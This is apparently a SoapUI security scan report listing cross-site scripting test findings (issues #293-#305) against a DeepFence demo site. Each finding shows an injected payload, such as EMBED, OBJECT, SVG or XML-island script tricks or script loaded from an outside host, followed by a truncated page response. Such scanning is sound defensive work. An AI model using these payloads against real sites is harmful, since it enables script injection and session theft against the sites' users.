href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #293\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://soapui.org/\nscriptlet.html\"></OBJECT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #294\nCross Site ScriptingScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-\n0080c744f389><param name=url value=javascript:alert('XSS')>\n</OBJECT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #295\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <EMBED SRC=\"http://soapui.org/xss.swf\" AllowScriptAccess\n=\"always\"></EMBED>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #296\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH \nA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv \nMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs \naW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw\nIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh \nTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"\nalways\"></EMBED>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=\ndevice-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head\n/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window._\n_DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk \nWidget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/\nekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End \nof Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" \ntype=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZ\nVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIk\niLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary hints on \nyour systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be echoed back DemoUser1# \nin the response\nCWE-ID CWE-79\nIssue Number #297\nCross Site ScriptingScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# a=\"get\";b=\"URL(\\\"\";c=\"javascript:\";d=\"alert('XSS');\\\")\";eval(a+\nb+c+d);\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #298\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]] ><![CDATA[\ncript:alert('XSS');\">]] ></C></X></xml><SPAN DATASRC=#I \nDATAFLD=C DATAFORMATAS=HTML></SPAN>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #299\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <XML ID=\"xss\"><I><B>&lt;IMG SRC=\"javas<!-- -->cript:alert('\nXSS')\"&gt;</B></I></XML><SPAN DATASRC=\"#xss\" DATAFLD\n=\"B\" DATAFORMATAS=\"HTML\"></SPAN>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #300\nScan Cross Site Scripting\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <HTML><BODY><?xml:namespace prefix=\"t\" ns=\"urn:\nschemas-microsoft-com:time\"><?import namespace=\"t\" \nimplementation=\"#default#time2\"><t:set attributeName=\"\ninnerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot\n;)&lt;/SCRIPT&gt;\"></BODY></HTML>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #301\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT SRC=\"http://soapui.org/xss.jpg\"></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #302\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <? echo('<SCR)';echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #303\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# <IMG SRC=\"http://soapui.org/somecommand.php?\nsomevariables=maliciouscode\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #304\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# Redirect 302 /a.jpg http://soapui.org/admin.asp&\ndeleteuser\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #305\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;\nSCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the 